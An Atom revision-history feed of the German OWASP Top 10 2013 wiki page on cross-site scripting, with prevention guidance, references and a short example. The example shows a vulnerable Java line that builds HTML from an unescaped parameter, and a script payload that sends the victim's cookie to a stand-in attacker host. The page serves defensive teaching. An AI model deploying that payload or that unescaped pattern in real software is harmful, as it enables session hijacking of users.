<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/index.php?action=history&amp;feed=atom&amp;title=Germany%2FProjekte%2FTop_10-2013-A3-Cross-Site_Scripting_%28XSS%29</id>
		<title>Germany/Projekte/Top 10-2013-A3-Cross-Site Scripting (XSS) - Revision history</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/index.php?action=history&amp;feed=atom&amp;title=Germany%2FProjekte%2FTop_10-2013-A3-Cross-Site_Scripting_%28XSS%29"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Germany/Projekte/Top_10-2013-A3-Cross-Site_Scripting_(XSS)&amp;action=history"/>
		<updated>2026-04-26T15:14:26Z</updated>
		<subtitle>Revision history for this page on the wiki</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Germany/Projekte/Top_10-2013-A3-Cross-Site_Scripting_(XSS)&amp;diff=153877&amp;oldid=prev</id>
		<title>T.Gigler: Top_10_2010:SummaryTableHeaderBeginTemplate|type=images =&gt; mit Bildern</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Germany/Projekte/Top_10-2013-A3-Cross-Site_Scripting_(XSS)&amp;diff=153877&amp;oldid=prev"/>
				<updated>2013-06-15T22:26:50Z</updated>
		
		<summary type="html">&lt;p&gt;Top_10_2010:SummaryTableHeaderBeginTemplate|type=images =&amp;gt; mit Bildern&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;tr style='vertical-align: top;' lang='en'&gt;
				&lt;td colspan='2' style=&quot;background-color: white; color:black; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan='2' style=&quot;background-color: white; color:black; text-align: center;&quot;&gt;Revision as of 22:26, 15 June 2013&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l14&quot; &gt;Line 14:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 14:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;}}&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;}}&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=de}}&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;{{Top_10_2010:SummaryTableHeaderBeginTemplate&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;|type=images&lt;/ins&gt;|year=2013|language=de}}&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=0|detectability=1|impact=2|year=2013|language=de}}&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=0|detectability=1|impact=2|year=2013|language=de}}&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>T.Gigler</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Germany/Projekte/Top_10-2013-A3-Cross-Site_Scripting_(XSS)&amp;diff=153844&amp;oldid=prev</id>
		<title>T.Gigler: Import vom engl. Wiki, mit language=de</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Germany/Projekte/Top_10-2013-A3-Cross-Site_Scripting_(XSS)&amp;diff=153844&amp;oldid=prev"/>
				<updated>2013-06-15T17:54:56Z</updated>
		
		<summary type="html">&lt;p&gt;Import vom engl. Wiki, mit language=de&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;{{Top_10_2013:TopTemplate&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A4-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |4&lt;br /&gt;
              |year=2013&lt;br /&gt;
              |language=de}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A2-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |2&lt;br /&gt;
              |year=2013&lt;br /&gt;
              |language=de}}&lt;br /&gt;
    |year=2013&lt;br /&gt;
    |language=de&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=de}}&lt;br /&gt;
{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=0|detectability=1|impact=2|year=2013|language=de}}&lt;br /&gt;
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}&amp;gt;&lt;br /&gt;
Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}&amp;gt;&lt;br /&gt;
Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&lt;br /&gt;
     &amp;lt;td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}&amp;gt;&lt;br /&gt;
[https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  XSS] is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws: 1) [https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  Stored], 2) [https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  Reflected], and 3) [https://www.owasp.org/index.php/DOM_Based_XSS DOM based XSS].&lt;br /&gt;
&lt;br /&gt;
Detection of most XSS flaws is fairly easy via testing or code analysis.&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}&amp;gt;&lt;br /&gt;
Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}&amp;gt;Consider the business value of the affected system and all the data it processes.&lt;br /&gt;
Also consider the business impact of public exposure of the vulnerability.&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
{{Top_10_2010:SummaryTableEndTemplate}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2013|language=de}}&lt;br /&gt;
&lt;br /&gt;
You are vulnerable if you do not ensure that all user supplied input is properly escaped, or you do not verify it to be safe via input validation, before including that input in the output page. Without proper output escaping or validation, such input will be treated as active content in the browser. If Ajax is being used to dynamically update the page, are you using [https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf  safe JavaScript APIs]? For unsafe JavaScript APIs, encoding or validation must also be used.&lt;br /&gt;
&lt;br /&gt;
Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, making automated detection difficult. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.&lt;br /&gt;
&lt;br /&gt;
Web 2.0 technologies, such as Ajax, make XSS much more difficult to detect via automated tools.&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2013|language=de}}&lt;br /&gt;
Preventing XSS requires separation of untrusted data from active browser content.&lt;br /&gt;
# The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the [https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet  OWASP XSS Prevention Cheat Sheet] for details on the required data escaping techniques.&lt;br /&gt;
# Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is &amp;lt;u&amp;gt;not a complete defense&amp;lt;/u&amp;gt; as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.&lt;br /&gt;
# For rich content, consider auto-sanitization libraries like OWASP’s [https://www.owasp.org/index.php/AntiSamy  AntiSamy] or the [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project  Java HTML Sanitizer Project].&lt;br /&gt;
# Consider [https://www.owasp.org/index.php/Content_Security_Policy  Content Security Policy (CSP)] to defend against XSS across your entire site.&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2013|language=de}}&lt;br /&gt;
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:ExampleBeginTemplate|year=2013}}&amp;lt;span style=&amp;quot;color:red;&amp;quot;&amp;gt;&lt;br /&gt;
(String) page += &amp;quot;&amp;lt;input name='creditcard' type='TEXT' value='&amp;quot; + request.getParameter(&amp;quot;CC&amp;quot;) + &amp;quot;'&amp;gt;&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/span&amp;gt;{{Top_10_2010:ExampleEndTemplate}}&lt;br /&gt;
&lt;br /&gt;
The attacker modifies the 'CC' parameter in their browser to:&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:ExampleBeginTemplate|year=2013}}&amp;lt;span style=&amp;quot;color:red;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:red;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;script&amp;gt;document.location=&lt;br /&gt;
'&amp;lt;nowiki&amp;gt;h&amp;lt;/nowiki&amp;gt;ttp://www.attacker.com/cgi-bin/cookie.cgi&lt;br /&gt;
?foo='+document.cookie&amp;lt;/script&amp;gt;'.&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/span&amp;gt;{{Top_10_2010:ExampleEndTemplate}}&lt;br /&gt;
&lt;br /&gt;
This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. &lt;br /&gt;
&lt;br /&gt;
Note that attackers can also use XSS to defeat any  automated CSRF defense the application might employ. See A8 for info on CSRF.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2013|language=de}}&lt;br /&gt;
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}&lt;br /&gt;
* [[XSS (Cross Site Scripting) Prevention Cheat Sheet | OWASP XSS Prevention Cheat Sheet&lt;br /&gt;
]]&lt;br /&gt;
* [[DOM_based_XSS_Prevention_Cheat_Sheet | OWASP DOM based XSS Prevention Cheat Sheet]]&lt;br /&gt;
* [[Cross-site_Scripting_(XSS) | OWASP Cross-Site Scripting Article]]&lt;br /&gt;
* [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html ESAPI Encoder API]&lt;br /&gt;
* [[ASVS | ASVS: Output Encoding/Escaping Requirements (V6)]]&lt;br /&gt;
* [[AntiSamy | OWASP AntiSamy: Sanitization Library]]&lt;br /&gt;
* [[Testing_for_Data_Validation | Testing Guide: 1st 3 Chapters on Data Validation Testing]]&lt;br /&gt;
* [[Reviewing_Code_for_Cross-site_scripting | OWASP Code Review Guide: Chapter on XSS Review]]&lt;br /&gt;
* [[XSS_Filter_Evasion_Cheat_Sheet | OWASP XSS Filter Evasion Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=de}}&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/79.html CWE Entry 79 on Cross-Site Scripting]&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2013:BottomAdvancedTemplate&lt;br /&gt;
    |type={{Top_10_2010:StyleTemplate}}&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A4-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |4&lt;br /&gt;
              |year=2013&lt;br /&gt;
              |language=de}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A2-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |2&lt;br /&gt;
              |year=2013&lt;br /&gt;
              |language=de}}&lt;br /&gt;
    |year=2013&lt;br /&gt;
    |language=de&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>T.Gigler</name></author>	</entry>

	</feed>